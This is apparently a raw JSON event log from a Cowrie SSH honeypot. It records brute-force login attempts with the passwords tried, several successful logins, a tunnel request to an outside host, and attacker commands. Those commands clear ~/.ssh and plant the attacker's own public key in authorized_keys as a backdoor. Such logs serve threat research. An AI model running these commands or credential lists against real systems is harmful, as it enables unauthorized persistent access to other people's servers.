{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:01:22.849336Z","src_ip":"196.251.86.249","session":"17baf034b63c"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwerty123","message":"login attempt [postgres/qwerty123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:01:25.452457Z","src_ip":"196.251.86.249","session":"17baf034b63c"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:01:27.030929Z","src_ip":"196.251.86.249","session":"17baf034b63c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":39306,"dst_ip":"1.2.3.4","dst_port":22,"session":"b48bad931d73","protocol":"ssh","message":"New connection: 196.251.86.249:39306 (1.2.3.4:22) [session: b48bad931d73]","sensor":"my-vps","timestamp":"2025-08-26T10:02:26.663913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:02:27.223422Z","src_ip":"196.251.86.249","session":"b48bad931d73"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:02:27.234949Z","src_ip":"196.251.86.249","session":"b48bad931d73"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123321","message":"login attempt [postgres/123321] failed","sensor":"my-vps","timestamp":"2025-08-26T10:02:29.735022Z","src_ip":"196.251.86.249","session":"b48bad931d73"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:02:31.323292Z","src_ip":"196.251.86.249","session":"b48bad931d73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36851,"dst_ip":"1.2.3.4","dst_port":23,"session":"1960b002e718","protocol":"telnet","message":"New connection: 212.227.235.229:36851 (1.2.3.4:23) [session: 1960b002e718]","sensor":"my-vps","timestamp":"2025-08-26T10:02:57.265883Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":19100,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca985d65312a","protocol":"ssh","message":"New connection: 212.227.125.160:19100 (1.2.3.4:22) [session: ca985d65312a]","sensor":"my-vps","timestamp":"2025-08-26T10:03:08.183004Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:03:08.185000Z","src_ip":"212.227.125.160","session":"ca985d65312a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":19366,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d49891b705e","protocol":"ssh","message":"New connection: 212.227.125.160:19366 (1.2.3.4:22) [session: 6d49891b705e]","sensor":"my-vps","timestamp":"2025-08-26T10:03:08.298722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:03:08.299534Z","src_ip":"212.227.125.160","session":"6d49891b705e"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T10:03:08.414690Z","src_ip":"212.227.125.160","session":"6d49891b705e"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:03:08.761549Z","src_ip":"212.227.125.160","session":"6d49891b705e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T10:03:08.877949Z","session":"6d49891b705e"}
{"eventid":"cowrie.session.closed","duration":13.194398880004883,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:03:10.460207Z","src_ip":"212.227.235.229","session":"1960b002e718"}
{"eventid":"cowrie.session.connect","src_ip":"43.134.105.66","src_port":51648,"dst_ip":"1.2.3.4","dst_port":22,"session":"108a63b16458","protocol":"ssh","message":"New connection: 43.134.105.66:51648 (1.2.3.4:22) [session: 108a63b16458]","sensor":"my-vps","timestamp":"2025-08-26T10:03:29.132663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:03:29.133765Z","src_ip":"43.134.105.66","session":"108a63b16458"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:03:29.386067Z","src_ip":"43.134.105.66","session":"108a63b16458"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38666,"dst_ip":"1.2.3.4","dst_port":22,"session":"88b6d0816faa","protocol":"ssh","message":"New connection: 196.251.86.249:38666 (1.2.3.4:22) [session: 88b6d0816faa]","sensor":"my-vps","timestamp":"2025-08-26T10:03:30.319131Z"}
{"eventid":"cowrie.login.success","username":"root","password":"123qwE","message":"login attempt [root/123qwE] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:03:30.435611Z","src_ip":"43.134.105.66","session":"108a63b16458"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:03:30.832176Z","src_ip":"196.251.86.249","session":"88b6d0816faa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:03:30.832916Z","src_ip":"196.251.86.249","session":"88b6d0816faa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:03:30.963700Z","src_ip":"43.134.105.66","session":"108a63b16458"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:03:30.964396Z","src_ip":"43.134.105.66","session":"108a63b16458"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:03:30.965757Z","src_ip":"43.134.105.66","session":"108a63b16458"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:03:31.220579Z","src_ip":"43.134.105.66","session":"108a63b16458"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:03:31.831880Z","src_ip":"43.134.105.66","session":"108a63b16458"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T10:03:31.832583Z","src_ip":"43.134.105.66","session":"108a63b16458"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T10:03:32.087538Z","src_ip":"43.134.105.66","session":"108a63b16458"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:03:32.088513Z","src_ip":"43.134.105.66","session":"108a63b16458"}
{"eventid":"cowrie.session.connect","src_ip":"43.134.105.66","src_port":51654,"dst_ip":"1.2.3.4","dst_port":22,"session":"16e65d12f1d6","protocol":"ssh","message":"New connection: 43.134.105.66:51654 (1.2.3.4:22) [session: 16e65d12f1d6]","sensor":"my-vps","timestamp":"2025-08-26T10:03:32.331026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:03:32.331927Z","src_ip":"43.134.105.66","session":"16e65d12f1d6"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"321123","message":"login attempt [postgres/321123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:03:32.448098Z","src_ip":"196.251.86.249","session":"88b6d0816faa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:03:32.576627Z","src_ip":"43.134.105.66","session":"16e65d12f1d6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T10:03:33.595523Z","src_ip":"43.134.105.66","session":"16e65d12f1d6"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:03:34.028761Z","src_ip":"196.251.86.249","session":"88b6d0816faa"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:03:34.842175Z","src_ip":"43.134.105.66","session":"16e65d12f1d6"}
{"eventid":"cowrie.session.connect","src_ip":"43.134.105.66","src_port":51662,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bb8aee64b6f","protocol":"ssh","message":"New connection: 43.134.105.66:51662 (1.2.3.4:22) [session: 8bb8aee64b6f]","sensor":"my-vps","timestamp":"2025-08-26T10:03:35.085437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:03:35.086255Z","src_ip":"43.134.105.66","session":"8bb8aee64b6f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:03:35.331155Z","src_ip":"43.134.105.66","session":"8bb8aee64b6f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:03:36.351107Z","src_ip":"43.134.105.66","session":"8bb8aee64b6f"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:03:36.596510Z","src_ip":"43.134.105.66","session":"108a63b16458"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:03:36.597205Z","src_ip":"43.134.105.66","session":"8bb8aee64b6f"}
{"eventid":"cowrie.session.connect","src_ip":"27.254.235.13","src_port":44048,"dst_ip":"1.2.3.4","dst_port":22,"session":"edded74585c9","protocol":"ssh","message":"New connection: 27.254.235.13:44048 (1.2.3.4:22) [session: edded74585c9]","sensor":"my-vps","timestamp":"2025-08-26T10:03:49.686168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:03:49.687029Z","src_ip":"27.254.235.13","session":"edded74585c9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:03:49.867988Z","src_ip":"27.254.235.13","session":"edded74585c9"}
{"eventid":"cowrie.login.success","username":"root","password":"@password","message":"login attempt [root/@password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:03:50.633098Z","src_ip":"27.254.235.13","session":"edded74585c9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:03:51.015247Z","src_ip":"27.254.235.13","session":"edded74585c9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:03:51.015988Z","src_ip":"27.254.235.13","session":"edded74585c9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:03:51.017201Z","src_ip":"27.254.235.13","session":"edded74585c9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:03:51.198966Z","src_ip":"27.254.235.13","session":"edded74585c9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:03:51.671762Z","src_ip":"27.254.235.13","session":"edded74585c9"}
